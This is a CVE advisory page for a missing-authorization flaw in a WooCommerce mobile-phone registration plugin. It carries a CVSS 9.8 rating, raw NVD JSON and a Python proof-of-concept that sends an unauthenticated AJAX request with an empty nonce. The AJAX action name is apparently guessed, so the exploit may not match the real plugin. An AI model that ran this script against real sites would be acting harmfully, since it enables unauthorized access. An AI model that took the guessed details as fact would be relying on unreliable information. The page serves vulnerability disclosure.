Security Vulnerability Report
中文
CVE-2025-69052 CVSS 9.8 CRITICAL

CVE-2025-69052

Published: 2026-01-22 17:16:19
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in FmeAddons Registration & Login with Mobile Phone Number for WooCommerce registration-login-with-mobile-phone-number allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Registration & Login with Mobile Phone Number for WooCommerce: from n/a through <= 1.3.1.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Registration & Login with Mobile Phone Number for WooCommerce <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69052 PoC - Missing Authorization in Registration & Login with Mobile Phone Number for WooCommerce # Affected Version: <= 1.3.1 # This PoC demonstrates the authorization bypass vulnerability import requests import sys def exploit_cve_2025_69052(target_url, phone_number): """ Exploit for Missing Authorization vulnerability in WooCommerce mobile phone registration plugin. This PoC demonstrates how an unauthenticated attacker can trigger registration-related functions. """ # Target endpoint (typically the WordPress AJAX handler) ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct malicious request to bypass authorization # The plugin's mobile registration endpoint lacks proper capability checks payload = { 'action': 'mobile_phone_registration_action', # Plugin's AJAX action 'mobile_phone': phone_number, 'user_data': 'test_user', 'nonce': '' # Missing or bypassable nonce validation } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2025-69052...") print(f"[*] Sending unauthorized registration request...") try: # Send the malicious request without authentication response = requests.post(ajax_endpoint, data=payload, headers=headers, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text[:500]}") if response.status_code == 200 and 'success' in response.text.lower(): print("[!] VULNERABLE: Authorization bypass successful!") print("[!] Attacker can trigger registration functions without authentication") return True else: print("[-] Possibly not vulnerable or target configuration differs") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <phone_number>") print(f"Example: python {sys.argv[0]} http://example.com +1234567890") sys.exit(1) target = sys.argv[1] phone = sys.argv[2] exploit_cve_2025_69052(target, phone)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69052", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:18.737", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in FmeAddons Registration & Login with Mobile Phone Number for WooCommerce registration-login-with-mobile-phone-number allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Registration & Login with Mobile Phone Number for WooCommerce: from n/a through <= 1.3.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en FmeAddons Registration &amp; Login with Mobile Phone Number para WooCommerce registration-login-with-mobile-phone-number permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Registration &amp; Login with Mobile Phone Number para WooCommerce: desde n/a hasta &lt;= 1.3.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/registration-login-with-mobile-phone-number/vulnerability/wordpress-registration-login-with-mobile-phone-number-for-woocommerce-plugin-1-2-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}